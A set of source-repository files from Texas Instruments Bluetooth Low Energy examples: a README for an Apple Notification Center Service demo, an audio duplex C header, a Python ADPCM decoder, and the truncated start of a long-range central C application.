"text": "ANCS Demo\n=========\n\n## Table of Contents\n\n* [**Introduction**](#Introduction)\n* [**Hardware Prerequisites**](#hardware-prerequisites)\n* [**Software Prerequisites**](#software-prerequisites)\n* [**Preprocessor Defines**](#preprocessor-defines)\n * [**USE\\_GUI\\_COMPOSER**](#use_gui_composer)\n * [**USE\\_WATCHDOG\\_TIMER**](#use_watchdog_timer)\n * [**IGNORE\\_PREEXISTING\\_NOTIFICATIONS**](#ignore_preexisting_notifications)\n* [**Usage**](#Usage)\n * [**GUI Composer Demonstration**](#gui_composer_demonstration)\n * [**UART Demonstration**](#uart-demonstration)\n\n## Introduction\n\nThe ANCS project implements a simple Bluetooth low energy\nperipheral device acting as a GATT client which receives Apple notification data\nfrom a mobile Apple device acting as a GATT server. This project is meant to\ndemonstrate a basic use of the Apple Notification Center Service or ANCS, and\ncan be adapted for use in a variety personal electronic applications. The ANCS's\nspecification can be found here:\n[**Apple Notification Center Service (ANCS) Specification**](https://developer.apple.com/library/content/documentation/CoreBluetooth/Reference/AppleNotificationCenterServiceSpecification/Introduction/Introduction.html).\n\nThis project uses stack and app configurations that are summarized in the table\nbelow:\n\nApp Build Configuration | Compatible Stack Configuration | Description\n-----------------------------|----------------------------------|-------------------------------------------------------------------\n`FlashROM_StackLibrary` | `FlashROM_Library` | Application build configuration linked to Stack library (fully executable)\n\n## Hardware Prerequisites\n\nThe default ANCS Demo configuration uses the\n[**LAUNCHXL-CC2640R2**](http://www.ti.com/tool/launchxl-cc2640r2). This hardware\nconfiguration is shown in the below image:\n\n\n\nFor custom hardware, see the Running the SDK on Custom Boards section of the\n[**Bluetooth 4.2 Software User's Guide for CC2640R2F**](http://software-dl.ti.com/lprf/blestack-latest/).\n\nThis application also requires a mobile Apple device running iOS that supports\nBluetooth 4.2.\n\n## Software Prerequisites\n\nThis project requires either the [**companion GUI Composer application**](https://dev.ti.com/gallery/)\n or a serial terminal application such as [**PuTTY**](http://www.putty.org/)\n or [**Tera Term**](https://ttssh2.osdn.jp/index.html.en) for its demonstrations.\n\nFor information on what versions of Code Composer Studio and IAR Embedded\nWorkbench to use, see the Release Notes located in the docs/blestack folder. For\ninformation on how to import this project into your IDE workspace and\nbuild/run, please refer to the CC2640R2F Platform section in the\n [**Bluetooth 4.2 Software User's Guide for CC2640R2F**](http://software-dl.ti.com/lprf/blestack-latest/).\n\n## Preprocessor Defines\n\nThis application has optional functionality toggled in the form of preprocessor\ndefines. See the BLE-Stack User's guide section for your selected IDE (IAR, CCS)\nfor more info on how to modify the preprocessor defines\n [**Bluetooth 4.2 Software User's Guide for CC2640R2F**](http://software-dl.ti.com/lprf/blestack-latest/).\n\n#### USE\\_GUI\\_COMPOSER\n\nThis symbol determines which demonstration mode the application is in.\nIf USE\\_GUI\\_COMPOSER is defined, the project will support the\n[GUI Composer 2.0 demonstration](#gui_composer_demonstration). If instead it is\nnot defined, the application will support the\n[UART demonstration](#uart_demonstration) instead.\n\nBy default `USE_GUI_COMPOSER` is defined.\n\n#### USE\\_WATCHDOG\\_TIMER\n\nThis symbol determines if a watchdog timer (WDT) is enabled in the application.\nThe WDT is enabled when `USE_WATCHDOG_TIMER` is defined, and disabled when the\nsymbol is undefined. The WDT is set to start counting down once the CC2640R2 is\nadvertising. The WDT is configured to wait five seconds before being kicked, and\nthe periodic task resetting the WDT will trigger every half-second. Both of\nthese values can be changed by adjusting `WATCHDOG_TIMER_TIMEOUT_PERIOD` and\n `ANCSAPP_PERIODIC_EVT_PERIOD` found at the top of ancs_app.c respectfully.\n\nBy default `USE_WATCHDOG_TIMER` is undefined.\n\n\n#### IGNORE\\_PREEXISTING\\_NOTIFICATIONS\n\nThis symbol determines if the application should include notifications\nthat exist on the mobile Apple device before the session with the CC2640R2 was\ninitiated. Such notifications are ignored if `IGNORE_PREEXISTING_NOTIFICATIONS`\nis defined, conversely preexisting notifications will be processed by the\napplication if the symbol is undefined.\n\nBy default `IGNORE_PREEXISTING_NOTIFICATIONS` is undefined.\n\n## Usage\n\nThis application has two primary modes of usage, a GUI Composer 2.0\ndemonstration, or a UART terminal demonstration.\n\nFor both demonstrations, this document will use an iPhone 6 Plus to serve as the\nmobile Apple device hosting the ANCS. Note that any mobile Apple device that\nsupports Bluetooth 4.2 should work accordingly.\n\n### GUI Composer Demonstration\n\nThe GUI Composer 2.0 partner application can be accessed\n[**Here**](https://dev.ti.com/gallery/). Simply search through the list of\napplications featured in the gallery for one titled **ANCS Demo**. Import the\nproject into GUI Composer.\n\n\n\nIt may be required to import the ANCS project into GUI composer to change the\nCOM Port Used by the GUI Composer application, see the screenshot below for\nsteps.\n\n\n\nNow the GUI Composer application is configured to use the correct COM port.\nClick the play button to run. You should now be presented with this page:\n\n\n\nYou may click okay **CLOSE** on the README.md window, and wait until the prompt\nin the bottom left of the application reads **waiting for data...** as seen in\nthe above picture.\n\nOn the mobile Apple device advertising is enabled by default upon startup, so\nthere is no need to physically press a button to start advertising. Unlock the\nmobile Apple device and open the Settings App. Open the Bluetooth settings tab\nand notice that \"ANCS Demo\" can now be connected to:\n\n\n\nNext, a prompt asking to pair to \"ANCS Demo\" should appear mobile Apple device:\n\n\n\nTap \"Pair\" and the mobile Apple device should complete the bonding process with\nthe ANCS Demo. The \"ANCS Demo\" should now appear with an \"i\" encompassed by a\ncircle signifying stored bond data:\n\n\n\nThe GUI application should now be displaying various notification data as it is\nretrieved:\n\n\n\nOnce notification data is no longer being retrieved for the existing\nnotifications, you may view retrieved notifications by selecting them in the\ndroplist box titled **Select Notification:**\n\n\n\nIf the mobile Apple device receives an incoming call, you may accept or decline\nthe call using the CC2640R2's right (Accept) and left (Decline) buttons. This\nis an image of the GUI application after accepting a an incoming call:\n\n\n\n**Note:** If the mobile Apple device generates any new notifications, the ANCS\nDemo will automatically retrieve the notification's data and display it\nrespectively.\n\n\n## UART Demonstration\n\n\nThis document will use PuTTY to serve as the display for the output of the\nCC2640R2 LaunchPad for the UART demonstration. Note that any other serial\nterminal application can be used. The following default parameters are used\n for the UART peripheral for display:\n\n UART Param |Default Values\n -------------- |----------------\n Baud Rate |115200\n Data length |8 bits\n Parity |None\n Stop bits |1 bit\n Flow Control |None\n\nOnce the ANCS Demo application starts, the output to the terminal\nwill report its address and the fact that it is advertising, as shown below:\n\n\n\nAdvertising is enabled by default upon startup, so there is no need to\nphysically press a button to start advertising. Unlock the mobile Apple device\nand open the Settings App. Open the Bluetooth settings tab and notice that\n\"ANCS Demo\" can now be connected to:\n\n\n\nTap \"ANCS Demo\" to connect to it. The terminal will now display \"Connected\" and\nthe address of the connected mobile Apple device as seen below:\n\n\n\nBack on the mobile Apple device a prompt asking to pair to \"ANCS Demo\" should\nappear:\n\n\n\nTap \"Pair\" and the mobile Apple device should complete the bonding process with\nthe ANCS Demo. The \"ANCS Demo\" should now appear with an \"i\" encompassed by a\ncircle signifying] stored bond data:\n\n\n\nBack on the terminal a stream of notification data should begin to be displayed.\nThese notifications can be found in the mobile Apple device's Notification\nCenter.\nWith each notification seven articles of data will de displayed:\n\n1. The number of notifications left to be processed\n2. The category of the notification\n3. The iOS application producing the notification's ID\n4. The display name of the iOS application\n5. The title of the iOS application\n6. The message of the notification\n7. The date and time the notification was created\n\n\n\nAdditionally, if the mobile Apple device receives an incoming call, the call\ncan be declined by pressing the button on the right side of the device.\nAlternatively, the call can be accepted by pressing the button on the left\nside of the device.\n\nThis is an example UART output of a call being declined:\n\n\n\n**Note:** If the mobile Apple device generates any new notifications, the ANCS\nDemo will automatically retrieve the notification's data and display it\nrespectively.\n"
},
{
"alpha_fraction": 0.5883417725563049,
"alphanum_fraction": 0.5994448661804199,
"avg_line_length": 31.494117736816406,
"blob_id": "89e023824ada78e27fea337e452aa8094af1f23e",
"content_id": "eaedbe0d471a2e8f34fe27f475624f5351d3ef37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 8286,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 255,
"path": "/source/ti/blestack/profiles/audio_dle/audio_duplex.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Filename: audio_duplex.h\n *\n * Description: Implements bidirectional VoGP audio/voice communication\n * This module connects data from the user application task(buttons),\n * data from the I2S driver (local audio frames), and data from the\n * BLE-Stack Audio Profile (incoming audio frames).\n *\n * Calls to this module run in the application task context. A callback\n * must be plugged for the module to handle higher priority CBs such as\n * Audio data and I2S callbacks\n *\n * Copyright (C) 2016 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\n#ifndef AUDIO_DUPLEX_H\n#define AUDIO_DUPLEX_H\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n/*********************************************************************\n * CONSTANTS\n */\n\n#define AUDIO_DUPLEX_SUCCESS 0\n#define AUDIO_MEM_FAIL -1\n#define AUDIO_HW_FAIL -2\n#define AUDIO_INVALID_PARAMS -3\n\n#define AUDIO_DUPLEX_I2S_FRAME_EVENT 0x01\n#define AUDIO_DUPLEX_I2S_ERROR_EVENT 0x02\n#define AUDIO_DUPLEX_SEND_STOP_CMD_EVENT 0x04\n#define AUDIO_DUPLEX_SEND_START_CMD_EVENT 0x08\n#define AUDIO_DUPLEX_STOP_I2S_EVENT 0x10\n#define AUDIO_DUPLEX_START_I2S_EVENT 0x20\n\n#define AUDIO_DUPLEX_CMD_STOP 0x00\n#define AUDIO_DUPLEX_CMD_START 0x04\n#define AUDIO_DUPLEX_CMD_START_MSBC 0x05\n#define AUDIO_DUPLEX_CMD_NONE 0xFF\n\n#define AUDIO_DUPLEX_STREAM_TYPE_NONE AUDIO_DUPLEX_CMD_STOP\n#define AUDIO_DUPLEX_STREAM_TYPE_ADPCM AUDIO_DUPLEX_CMD_START\n#define AUDIO_DUPLEX_STREAM_TYPE_MSBC AUDIO_DUPLEX_CMD_START_MSBC\n\n#define AUDIO_DUPLEX_VOLUME_UP 0x01\n#define AUDIO_DUPLEX_VOLUME_DOWN 0xFF\n\n#define AUDIO_DUPLEX_INPUT_OPTION AUDIO_CODEC_MIC_ONBOARD\n#define AUDIO_DUPLEX_OUTPUT_OPTION AUDIO_CODEC_SPEAKER_HP\n#define AUDIO_DUPLEX_MAX_VOLUME 75\n\n\n#define AUDIO_DUPLEX_BUFSIZE_ADPCM 96\n#define AUDIO_DUPLEX_HDRSIZE_ADPCM 4\n\n#define AUDIO_DUPLEX_ADPCM_SAMPLES_PER_FRAME AUDIO_DUPLEX_BUFSIZE_ADPCM\n\n#define AUDIO_DUPLEX_MSBC_SAMPLES_PER_FRAME 120\n#define AUDIO_DUPLEX_HDRSIZE_MSBC 1\n#define AUDIO_DUPLEX_MSBC_ENCODED_SIZE 57\n\n#define AUDIO_DUPLEX_SAMPLE_RATE 16000\n#define AUDIO_DUPLEX_NUM_CHAN 2\n\n/*********************************************************************\n * TYPEDEFS\n */\ntypedef enum\n{\n AudioDuplex_stream_idle,\n AudioDuplex_send_start_cmd,\n AudioDuplex_start_I2S,\n AudioDuplex_stream_active,\n AudioDuplex_send_stop_cmd,\n AudioDuplex_stop_I2S,\n}AudioDuplex_streamState;\n\n/**\n * This enum is used to identify the data passed on from _processGATTMsg\n */\ntypedef enum\n{\n AudioDuplex_start_stop,\n AudioDuplex_data\n} AudioDuplex_dataType;\n\n/**\n * General data struct.\n */\ntypedef struct\n{\n uint16 len; //!< Length of data\n uint8 *pValue; //!< Data\n} AudioDuplex_audioData;\n\ntypedef struct\n{\n AudioDuplex_streamState streamState;\n AudioDuplex_streamState requestedStreamState;\n uint8_t streamType;\n uint8_t requestedStreamType;\n uint8_t samplesPerFrame;\n uint8_t notificationsPerFrame;\n uint8_t numOfFramesToBuffer;\n uint8_t rfFrameSize;\n int8_t si; //Step Index\n int16_t pv; //Predict Value\n int8_t si_rx;\n int16_t pv_rx;\n int8_t maxVolume;\n} AudioDuplex_streamVars;\n\n/**\n * @brief Audio Duplex Callback Function\n *\n * This callback notifies the application of an event that occurred in a\n * lower layer audio callback such as the I2S module\n *\n * @param events Bitmask of events posted by audio duplex module\n */\ntypedef void (*pfnAudioDuplexCB_t)(uint8_t events);\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn AudioDuplex_open\n *\n * @brief Called during initialization, opens codec and I2S driver\n * Initializes hardware and adds Audio Profile\n *\n * @param None.\n *\n * @return None.\n */\nextern int8_t AudioDuplex_open(Display_Handle displayHandle,\n PIN_Handle pinHandle,\n pfnAudioDuplexCB_t inputCB);\n\n/*********************************************************************\n * @fn AudioDuplex_close\n *\n * @brief Closes hardware, stops streaming\n *\n * @param None.\n *\n * @return None.\n */\nextern void AudioDuplex_close(void);\n\n/*********************************************************************\n * @fn AudioDuplex_setConnectionHandle\n *\n * @brief Set the connection handle of audio streaming\n *\n * @param cxnHdl - Connection handle.\n *\n * @return None\n */\nextern void AudioDuplex_setConnectionHandle(uint16_t connectionHandle);\n\n/*********************************************************************\n * @fn AudioDuplex_getConnectionHandle\n *\n * @brief Get the connection handle of audio streaming\n *\n * @return connectionHandle- the handle used to stream\n */\nextern uint16_t AudioDuplex_getConnectionHandle(void);\n\n/*********************************************************************\n * @fn AudioDuplex_eventHandler\n *\n * @brief Processes Events called from I2S or BLE-Stack callbacks\n *\n * @param events - Events to process.\n *\n * @return None\n */\nextern void AudioDuplex_eventHandler(uint8_t events);\n\n/*********************************************************************\n * @fn AudioDuplex_processData\n *\n * @brief Process incoming audio data\n *\n * @return None\n */\nextern void AudioDuplex_processData(AudioDuplex_dataType data_type,\n AudioDuplex_audioData *pMsg);\n\n/*********************************************************************\n * @fn AudioDuplex_startStreaming\n *\n * @brief Starts streaming audio to connected device\n *\n * @param requestedStreamType - The type of stream to start:\n * - AUDIO_DUPLEX_STREAM_TYPE_ADPCM\n * - AUDIO_DUPLEX_STREAM_TYPE_MSBC\n *\n * @return None.\n */\nextern void AudioDuplex_startStreaming(uint8_t requestedStreamType);\n\n/*********************************************************************\n * @fn AudioDuplex_stopStreaming\n *\n * @brief Close and cleanup audio stream\n *\n * @param None.\n *\n * @return None.\n */\nextern void AudioDuplex_stopStreaming(void);\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* AUDIO_DUPLEX_H */\n"
},
{
"alpha_fraction": 0.5140917301177979,
"alphanum_fraction": 0.5862991213798523,
"avg_line_length": 32.75694274902344,
"blob_id": "ecfdd638c4e58485ffeccc46fedf39cc5175562e",
"content_id": "e62d4b845fc6990407a8157098086a9a290bb0db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4861,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 144,
"path": "/tools/scripts/voice/codec/adpcm.py",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "\"\"\"\n/*\n * Filename: codecs.py\n *\n * Description: Various codes used by the audio script\n *\n * Copyright (C) 2017 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\"\"\"\n\nfrom .codec import CodecBase\nimport logging\nfrom struct import unpack, pack\n\n\nclass ADPCM(CodecBase):\n \"\"\"\n Implementation of a Codec class for TI's PDM driver\n \"\"\"\n\n __STEPSIZE_LUT = [\n 7, 8, 9, 10, 11, 12, 13, 14, 16, 17, 19, 21, 23, 25, 28, 31,\n 34, 37, 41, 45, 50, 55, 60, 66, 73, 80, 88, 97, 107, 118, 130, 143,\n 157, 173, 190, 209, 230, 253, 279, 307, 337, 371, 408, 449, 494, 544, 598, 658,\n 724, 796, 876, 963, 1060, 1166, 1282, 1411, 1552, 1707, 1878, 2066, 2272, 2499, 2749, 3024,\n 3327, 3660, 4026, 4428, 4871, 5358, 5894, 6484, 7132, 7845, 8630, 9493, 10442, 11487, 12635, 13899,\n 15289, 16818, 18500, 20350, 22385, 24623, 27086, 29794, 32767\n ]\n\n __INDEXLUT = [\n -1, -1, -1, -1, 2, 4, 6, 8,\n -1, -1, -1, -1, 2, 4, 6, 8\n ]\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.info(\"Init\")\n\n self.__SI_Dec = 0\n self.__PV_Dec = 0\n\n def decode(self, buffer):\n \"\"\"\n Function to decode the buffer\n\n :param buffer: coded buffer\n :return: The decoded data\n \"\"\"\n decoded = bytearray()\n\n for b in buffer:\n b, = unpack('B', b)\n self.logger.debug(\"decode: 0x%02X\", b)\n sample1 = self.__tic1_DecodeSingle(b & 0x0F)\n sample2 = self.__tic1_DecodeSingle((b >> 4) & 0xF)\n decoded += pack('@hh', sample1, sample2)\n\n return decoded\n\n def __tic1_DecodeSingle(self, nibble):\n\n self.logger.debug(\"__tic1_DecodeSingle: 0x%X\", nibble)\n\n step = ADPCM.__STEPSIZE_LUT[self.__SI_Dec]\n cum_diff = step >> 3\n\n self.__SI_Dec += ADPCM.__INDEXLUT[nibble]\n\n if self.__SI_Dec < 0:\n self.__SI_Dec = 0\n if self.__SI_Dec > 88:\n self.__SI_Dec = 88\n\n if nibble & 4:\n cum_diff += step\n if nibble & 2:\n cum_diff += step >> 1\n if nibble & 1:\n cum_diff += step >> 2\n\n if nibble & 8:\n if self.__PV_Dec < (-32767+cum_diff):\n self.__PV_Dec = -32767\n else:\n self.__PV_Dec -= cum_diff\n else:\n if self.__PV_Dec > (0x7fff-cum_diff):\n self.__PV_Dec = 0x7fff\n else:\n self.__PV_Dec += cum_diff\n\n return self.__PV_Dec\n\n\nif __name__ == '__main__':\n logger = logging.getLogger(\"ADPCM\")\n logger.setLevel(logging.CRITICAL)\n logger.setLevel(logging.ERROR)\n logger.setLevel(logging.WARNING)\n logger.setLevel(logging.INFO)\n logger.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n print ('Subclass:', issubclass(ADPCM, CodecBase))\n print ('Instance:', isinstance(ADPCM(), CodecBase))\n\n test = ADPCM()\n"
},
{
"alpha_fraction": 0.5837576985359192,
"alphanum_fraction": 0.5926284193992615,
"avg_line_length": 29.43836212158203,
"blob_id": "ee35927058372c7931dcd84ef1c176dd3e775b65",
"content_id": "0160e63f93a6cdb844b55959bdebc87ba3926c33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 66173,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 2174,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/src/app/longrange_central.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file longrange_central.c\n\n @brief This file contains the Throughput Central sample application for use\n with the CC2650 Bluetooth Low Energy Protocol Stack.\n\n Group: CMCU, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2013-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n ******************************************************************************\n Release Name: simplelink_cc2640r2_sdk_1_35_00_07_eng\n Release Date: 2017-03-23 10:36:21\n *****************************************************************************/\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include <ti/sysbios/knl/Task.h>\n#include <ti/sysbios/knl/Clock.h>\n#include <ti/sysbios/knl/Event.h>\n#include <ti/sysbios/knl/Queue.h>\n#include <ti/sysbios/hal/Hwi.h>\n\n#include <ti/display/Display.h>\n\n#include \"bcomdef.h\"\n\n#include <icall.h>\n#include \"util.h\"\n/* This Header file contains all BLE API and icall structure definition */\n#include \"icall_ble_api.h\"\n\n#include \"central.h\"\n\n#include \"board_key.h\"\n#include <menu/two_btn_menu.h>\n\n#include \"longrange_central_menu.h\"\n#include \"profiles/temperature/temperature_service.h\"\n#include \"profiles/throughput/throughput_service.h\"\n\n#include \"board.h\"\n\n#include \"longrange_central.h\"\n\n#include \"ble_user_config.h\"\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n// These Constants are for Application Queue Events\n// These Events contain information on the Queue and need to be processed\n#define SBC_STATE_CHANGE_EVT 0x0001\n#define SBC_KEY_CHANGE_EVT 0x0002\n#define SBC_RSSI_READ_EVT 0x0004\n#define SBC_PDU_UPDATE_EVT 0x0008\n#define SBC_PHY_UPDATE_EVT 0x0010\n#define SBC_MEASURE_INST_SPEED_EVT 0x0020\n#define SBC_ENABLE_TEMPERATURE_NOTI_EVT 0x0040\n\n// Simple BLE Central Task Events - often containing no information to process\n// other than the event itself\n#define SBC_ICALL_EVT ICALL_MSG_EVENT_ID // Event_Id_31\n#define SBC_QUEUE_EVT UTIL_QUEUE_EVENT_ID // Event_Id_30\n#define SBC_START_DISCOVERY_EVT Event_Id_00\n#define SBC_PERIODIC_LED_EVT Event_Id_01\n\n#define SBC_ALL_EVENTS (SBC_ICALL_EVT | \\\n SBC_QUEUE_EVT | \\\n SBC_START_DISCOVERY_EVT | \\\n SBC_PERIODIC_LED_EVT)\n\n// Maximum number of scan responses\n#define DEFAULT_MAX_SCAN_RES 8\n\n// Scan duration in ms\n#define DEFAULT_SCAN_DURATION 4000\n\n// Discovery mode (limited, general, all)\n#define DEFAULT_DISCOVERY_MODE DEVDISC_MODE_ALL\n\n// TRUE to use active scan\n#define DEFAULT_DISCOVERY_ACTIVE_SCAN TRUE\n\n// TRUE to use white list during discovery\n#define DEFAULT_DISCOVERY_WHITE_LIST FALSE\n\n// TRUE to use high scan duty cycle when creating link\n#define DEFAULT_LINK_HIGH_DUTY_CYCLE FALSE\n\n// TRUE to use white list when creating link\n#define DEFAULT_LINK_WHITE_LIST FALSE\n\n// Default RSSI polling period in ms\n#define DEFAULT_RSSI_PERIOD 4000\n\n#define SBC_PERIODIC_LED_PERIOD 500\n\n// Whether to enable automatic parameter update request when a connection is\n// formed\n#define DEFAULT_ENABLE_UPDATE_REQUEST GAPCENTRALROLE_PARAM_UPDATE_REQ_AUTO_ACCEPT\n\n// Minimum connection interval (units of 1.25ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_MIN_CONN_INTERVAL 400\n\n// Maximum connection interval (units of 1.25ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_MAX_CONN_INTERVAL 800\n\n// Slave latency to use if automatic parameter update request is enabled\n#define DEFAULT_UPDATE_SLAVE_LATENCY 0\n\n// Supervision timeout value (units of 10ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_CONN_TIMEOUT 100\n\n// Default service discovery timer delay in ms\n#define DEFAULT_SVC_DISCOVERY_DELAY 3000\n\n#define CODED_PHY_CHANGE_DELAY 500\n\n// Type of Display to open\n#if defined(BOARD_DISPLAY_USE_LCD) && (BOARD_DISPLAY_USE_LCD!=0)\n #define SBC_DISPLAY_TYPE Display_Type_LCD\n#elif defined (BOARD_DISPLAY_USE_UART) && (BOARD_DISPLAY_USE_UART!=0)\n #define SBC_DISPLAY_TYPE Display_Type_UART\n#else // !BOARD_DISPLAY_USE_LCD && !BOARD_DISPLAY_USE_UART\n #define SBC_DISPLAY_TYPE 0 // Option not supported\n#endif // BOARD_DISPLAY_USE_LCD && BOARD_DISPLAY_USE_UART\n\n// Row numbers\n#define SBC_ROW_RESULT TBM_ROW_APP\n#define SBC_ROW_STATUS_1 (TBM_ROW_APP + 1)\n#define SBC_ROW_STATUS_2 (TBM_ROW_APP + 2)\n#define SBC_ROW_PEER_DEVICE (TBM_ROW_APP + 2)\n#define SBC_ROW_STATUS_3 (TBM_ROW_APP + 3)\n#define SBC_ROW_PHY (TBM_ROW_APP + 3)\n#define SBC_ROW_RSSI (TBM_ROW_APP + 4)\n#define SBC_ROW_TEMP (TBM_ROW_APP + 5)\n\n// Task configuration\n#define SBC_TASK_PRIORITY 1\n\n#ifndef SBC_TASK_STACK_SIZE\n#define SBC_TASK_STACK_SIZE 864\n#endif\n#define DLE_MAX_PDU_SIZE 251\n#define DLE_MAX_TX_TIME 17040\n\n#define DEFAULT_PDU_SIZE 27\n#define DEFAULT_TX_TIME 328\n\n// Application states\nenum\n{\n BLE_STATE_IDLE,\n BLE_STATE_CONNECTING,\n BLE_STATE_CONNECTED,\n BLE_STATE_DISCONNECTING\n};\n\n// Discovery states\nenum\n{\n BLE_DISC_STATE_IDLE, // Idle\n BLE_DISC_STATE_MTU, // Exchange ATT MTU size\n BLE_DISC_STATE_THROUGHPUT_SERVICE, // Throughput Service discovery\n BLE_DISC_STATE_THROUGHPUT_CHAR, // Throughput Characteristic discovery\n BLE_DISC_STATE_TEMPERATURE_SERVICE, // Temperature Service discovery\n BLE_DISC_STATE_TEMPERATURE_CHAR, // Temperature Characteristic discovery\n};\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n// App event passed from profiles.\ntypedef struct\n{\n appEvtHdr_t hdr; // event header\n uint8_t *pData; // event data\n} sbcEvt_t;\n\n// RSSI read data structure\ntypedef struct\n{\n uint16_t period; // how often to read RSSI\n uint16_t connHandle; // connection handle\n Clock_Struct *pClock; // pointer to clock struct\n} readRssi_t;\n\n// A struct to contain scan response data we're interested in\n// Nameless struct 